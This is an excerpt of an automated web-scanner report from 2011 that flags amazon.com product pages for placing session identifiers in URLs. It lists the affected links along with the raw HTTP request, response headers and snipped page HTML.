<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=113496E24FD421A11E316AD1E459851B2F5E7309&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=03C344605DE37626CB4960BA9773574E491143FA&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.72. http://www.amazon.com/dp/B000EFAO1G

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B000EFAO1G

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_1?ie=UTF8&quantity.1=1&asin.1=B000EMRT2Q&offeringID.1=7jcq51LAg6i14P%252F7j%252Bkijz2%252FhwpXMqgFsJtRpW6D5jiJizPY%252BzRcfvxN7286dP5kL38WX4nD%252FKQc9OGM6eOytmrssA1jD8nY8Eov4tfDtxs%253D&action=addToCart&session-id=191-2655627-9808834
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_2?ie=UTF8&quantity.1=1&asin.1=B000EG4614&offeringID.1=%252F0siBAHrjRmSUMbYbFkOPPJ%252FmQcBG%252FCzPlKHaKwvU8Bn3du1H1CMyLxZZ6IkGyXlsoMFMh8iZLo6HtNFS4c7uhk7yZsW87DzVNzsBMGR56U%253D&action=addToCart&session-id=191-2655627-9808834
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_3?ie=UTF8&quantity.1=1&asin.1=B000C3U9II&offeringID.1=uz4LC9uODEANYmCS2BLmumflXP%252BA9jav0LyJFZWjtblFTk6t%252B57BiGsNK56pLSDZos8iX6canx7%252FdrDoCOHtpM8gOQvl5soAsDR64PzWvQg%253D&action=addToCart&session-id=191-2655627-9808834
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_sg_mainitem_atc?ie=UTF8&quantity.1=1&asin.1=B000EFAO1G&offeringID.1=4ySNZgakPd3BAo2i0BeY8RYqU%252BGOvdceafD49r5xM8uLA9aHFfkaggJZ%252BhhfC9OoOIGLAnX6QWhS1occmcjYko0IOXtSrFEuB5q2eh13y5Q%253D&action=addToCart&session-id=191-2655627-9808834
  • http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=sporting-goods&nodeID=3375251&itemCount=1&offeringID.1=GTgJL3KUmyFqvnHULLAj%252FhWk173a%252BMiXJUK2MbmeXUgx2t9ECo62OedEENdvmIYKvNj44VhweK715aN2KtPFtWtL%252Fnn%252FoIctW9%252B8dwhuNDCXptyY3CsDr68NTifca%252FqczhfXOt9RXCw%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=191-2655627-9808834
  • http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=sporting-goods&nodeID=3375251&itemCount=1&offeringID.1=adHPCzl%252Fz0nRwfx10WS%252Bc7exJR2icuaHyjmC1DAu%252Bn6HOyULH%252BE16FXRAwsGCaY0qUwY4GNmKwyag1pYgINIqhOL0AjMyL26OcsDl9rZfW8wGXrzjDdkSFmoCs9y8e7x2QL5XGS8Dmxe0w8g4iNbqQ%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=191-2655627-9808834
  • http://www.amazon.com/gp/redirect.html/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_QHTpnb12JDNYD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_fa_dp_QHTpnb12JDNYD%26bodytext%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_QHTpnb12JDNYD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB000EFAO1G%252Fref%253Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26count%3Dnone
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EF76A88233722F79F2BE14EA125B3E4220402566&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AEDB9FA1F3AC9E736846DE84F12A5A9C8BC44BCB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C91EB2221487561A30D06874DDE2B3D4919A3B3B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=042DBD34F7B8D4936967EFF2468A191965D10C62&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=304FCF9B2857ABA16716F0B4D0717989AA818AAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C006024D96E73A8B7B8B1241C3168FE1774D5B24&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7FDD05AB3E47C790F8D19B7B0B4AC8850D9AB7AC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=13BCECE2D82B947E0B79ABCDD4423AAE6290289D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=50E5D61092C9B40233DE2ABF4AB162EFE2F291DD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834

Request

GET /dp/B000EFAO1G HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:25 GMT
Server: Server
x-amz-id-1: 1M2XJ9DYN6Y7DG42N4TW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: ELcbf77740Mumzbh/Vico0QNtTydBr4E0na/ZodtnWmM3Vn8HD32Uh0849K57dxN
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=191-2655627-9808834; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 365604


<html>
<head>


<style type="text/css"><!--


BODY { fo
...[SNIP]...
<span id="mbc_B000EFAO1G_A1MVLP2KD6X0FZ_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=sporting-goods&nodeID=3375251&itemCount=1&offeringID.1=adHPCzl%252Fz0nRwfx10WS%252Bc7exJR2icuaHyjmC1DAu%252Bn6HOyULH%252BE16FXRAwsGCaY0qUwY4GNmKwyag1pYgINIqhOL0AjMyL26OcsDl9rZfW8wGXrzjDdkSFmoCs9y8e7x2QL5XGS8Dmxe0w8g4iNbqQ%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=191-2655627-9808834" ><span>
...[SNIP]...
<span id="mbc_B000EFAO1G_A92C6K2Y6F903_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=sporting-goods&nodeID=3375251&itemCount=1&offeringID.1=GTgJL3KUmyFqvnHULLAj%252FhWk173a%252BMiXJUK2MbmeXUgx2t9ECo62OedEENdvmIYKvNj44VhweK715aN2KtPFtWtL%252Fnn%252FoIctW9%252B8dwhuNDCXptyY3CsDr68NTifca%252FqczhfXOt9RXCw%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=191-2655627-9808834" ><span>
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_QHTpnb12JDNYD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_fa_dp_QHTpnb12JDNYD%26bodytext%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_QHTpnb12JDNYD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_fa_dp_QHTpnb12JDNYD%26bodytext%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_QHTpnb12JDNYD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB000EFAO1G%252Fref%253Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_QHTpnb12JDNYD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB000EFAO1G%252Fref%253Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_sg_mainitem_atc?ie=UTF8&quantity.1=1&asin.1=B000EFAO1G&offeringID.1=4ySNZgakPd3BAo2i0BeY8RYqU%252BGOvdceafD49r5xM8uLA9aHFfkaggJZ%252BhhfC9OoOIGLAnX6QWhS1occmcjYko0IOXtSrFEuB5q2eh13y5Q%253D&action=addToCart&session-id=191-2655627-9808834" id="acc_cartadd_button_B000EFAO1G" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_1?ie=UTF8&quantity.1=1&asin.1=B000EMRT2Q&offeringID.1=7jcq51LAg6i14P%252F7j%252Bkijz2%252FhwpXMqgFsJtRpW6D5jiJizPY%252BzRcfvxN7286dP5kL38WX4nD%252FKQc9OGM6eOytmrssA1jD8nY8Eov4tfDtxs%253D&action=addToCart&session-id=191-2655627-9808834" id="acc_cartadd_button_B000EMRT2Q" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_2?ie=UTF8&quantity.1=1&asin.1=B000EG4614&offeringID.1=%252F0siBAHrjRmSUMbYbFkOPPJ%252FmQcBG%252FCzPlKHaKwvU8Bn3du1H1CMyLxZZ6IkGyXlsoMFMh8iZLo6HtNFS4c7uhk7yZsW87DzVNzsBMGR56U%253D&action=addToCart&session-id=191-2655627-9808834" id="acc_cartadd_button_B000EG4614" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_3?ie=UTF8&quantity.1=1&asin.1=B000C3U9II&offeringID.1=uz4LC9uODEANYmCS2BLmumflXP%252BA9jav0LyJFZWjtblFTk6t%252B57BiGsNK56pLSDZos8iX6canx7%252FdrDoCOHtpM8gOQvl5soAsDR64PzWvQg%253D&action=addToCart&session-id=191-2655627-9808834" id="acc_cartadd_button_B000C3U9II" ><span>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AEDB9FA1F3AC9E736846DE84F12A5A9C8BC44BCB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EF76A88233722F79F2BE14EA125B3E4220402566&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C91EB2221487561A30D06874DDE2B3D4919A3B3B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=13BCECE2D82B947E0B79ABCDD4423AAE6290289D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7FDD05AB3E47C790F8D19B7B0B4AC8850D9AB7AC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=50E5D61092C9B40233DE2ABF4AB162EFE2F291DD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=304FCF9B2857ABA16716F0B4D0717989AA818AAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=042DBD34F7B8D4936967EFF2468A191965D10C62&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C006024D96E73A8B7B8B1241C3168FE1774D5B24&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.73. http://www.amazon.com/dp/B001AIM6V2

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B001AIM6V2

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_.HTpnb0BJD30K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_fa_dp_.HTpnb0BJD30K%26bodytext%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520December%25202007%252C%2520Vol.%252015%252C%2520No.%25208%252C%2520Sam%2520Elliott%2520by%2520Jason%2520Bell
